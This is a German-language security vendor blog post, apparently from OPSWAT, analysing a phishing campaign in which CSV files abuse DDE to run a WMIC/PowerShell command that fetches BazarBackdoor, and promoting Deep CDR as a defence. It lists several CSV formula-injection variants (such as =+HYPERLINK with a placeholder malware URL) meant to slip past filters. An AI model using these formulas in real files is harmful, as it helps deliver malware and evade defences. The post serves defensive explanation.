Im Februar 2022 entdeckte der Malware-Forscher Chris Campbell eine neue Phishing-Kampagne, bei der speziell gestaltete CSV-Textdateien (Comma-Separated Values) verwendet werden, um die Geräte der Benutzer mit dem BazarBackdoor-Trojaner zu infizieren. In diesem Blogbeitrag analysieren wir das Angriffsszenario und zeigen Ihnen, wie Sie diesen raffinierten Angriff mit Deep CDR
(Entschärfung und Rekonstruktion von Inhalten).
Die Angriffstaktik
Bei dieser Phishing-Kampagne nutzten die Cyberkriminellen eine CSV-Datei - eine Textdatei mit Trennzeichen, die Daten in einem Tabellenformat speichert und Werte durch ein Komma trennt. Dieser Dateityp ist eine beliebte Methode, um einfache Daten zwischen Datenbanken und Anwendungen auszutauschen. Da eine CSV-Datei einfach nur Text ohne ausführbaren Code enthält, halten viele Benutzer sie für harmlos und öffnen das Dokument schnell und unbedacht. Sie ahnen nicht, dass die Datei ein Bedrohungsvektor sein könnte, über den Malware auf ihre Geräte gelangen kann, wenn die CSV-Datei mit Anwendungen geöffnet wird, die den dynamischen Datenaustausch (DDE) unterstützen, wie Microsoft Excel und OpenOffice Calc. Diese Anwendungen können die Formeln und Funktionen in der CSV-Datei ausführen. Bedrohungsautoren missbrauchen diese DDE-Funktion, um beliebige Befehle auszuführen, die den BazarBackdoor-Trojaner herunterladen und installieren, um das Gerät des unvorsichtigen Opfers zu kompromittieren und vollständigen Zugriff auf Unternehmensnetzwerke zu erhalten. Im Vergleich zu gängigen Angriffsmethoden mit einem bösartigen Makro oder VBA-Code, der in einer MS Office-Datei versteckt ist, sind in DDE-Dokumenten versteckte Bedrohungen schwerer zu erkennen.
Wenn man die Datei genau untersucht, kann man in einer der Datenspalten einen =WmiC|-Befehl (Windows Management Interface Command) erkennen. Wenn die Opfer versehentlich zulassen, dass diese DDE-Funktion ausgeführt wird, erstellt sie einen PowerShell-Befehl. Der Befehl öffnet dann eine Remote-URL, um einen BazarLoader herunterzuladen, und BazarBackdoor wird auf dem Computer des Opfers installiert.
Wie Deep CDR Ihnen bei der Abwehr von DDE-Angriffen hilft
Sie können Ihr Netzwerk vor diesen raffinierten Phishing-Kampagnen schützen, indem Sie die an E-Mails angehängten Dateien säubern, bevor sie Ihre Benutzer erreichen. Mit dem Gedanken, dass jede Datei eine potenzielle Bedrohung darstellt, und mit dem Fokus auf Vorbeugung und nicht nur auf Erkennung, entfernt Deep CDR alle aktiven Inhalte in den Dateien, während die Nutzbarkeit und Funktionalität der Dateien erhalten bleibt. Deep CDR ist eine der sechs Schlüsseltechnologien von MetaDefender - der fortschrittlichen Bedrohungsschutzplattform von OPSWAT, die die Zero-Trust-Philosophie wirklich umsetzt.
Nachfolgend finden Sie die Bereinigungsdetails, nachdem wir die infizierte CSV-Datei mit MetaDefender Core verarbeitet haben (Sie können auch das Scan-Ergebnis auf MetaDefender Cloud einsehen). Deep CDR hat die Formel in der Datei neutralisiert, so dass kein PowerShell-Befehl erstellt wurde. Die Malware konnte dann nicht heruntergeladen werden.
Bei ähnlichen Angriffen verwenden die Angreifer komplexere Formeln, um die Erkennung zu umgehen. Normalerweise beginnen Formeln in MS Excel mit einem Gleichheitszeichen (=). Da diese Anwendung jedoch auch Formeln akzeptiert, die mit einem anderen Zeichen beginnen, z. B. "=+" oder "@", anstatt nur "=", kann die destruktive Formel in CSV-Dateien lauten:
=+HYPERLINK("<malware URL>")
=-HYPERLINK("<malware URL>")
=@HYPERLINK("<malware URL>")
+@HYPERLINK("<malware URL>")
-@HYPERLINK("<malware URL>")
Diese Art von Formeln kann einigen gängigen CDR-Systemen entgehen. Deep CDR kann jedoch problemlos mit dieser Taktik umgehen und saubere, unbedenkliche Dateien ausgeben, wodurch die Bedrohung neutralisiert wird.
Erfahren Sie mehr über Deep CDR oder sprechen Sie mit einem technischen Experten von OPSWAT , um die besten Sicherheitslösungen zum Schutz Ihres Unternehmensnetzwerks und Ihrer Benutzer vor Zero-Day-Angriffen und fortschrittlicher, ausweichender Malware zu erfahren.
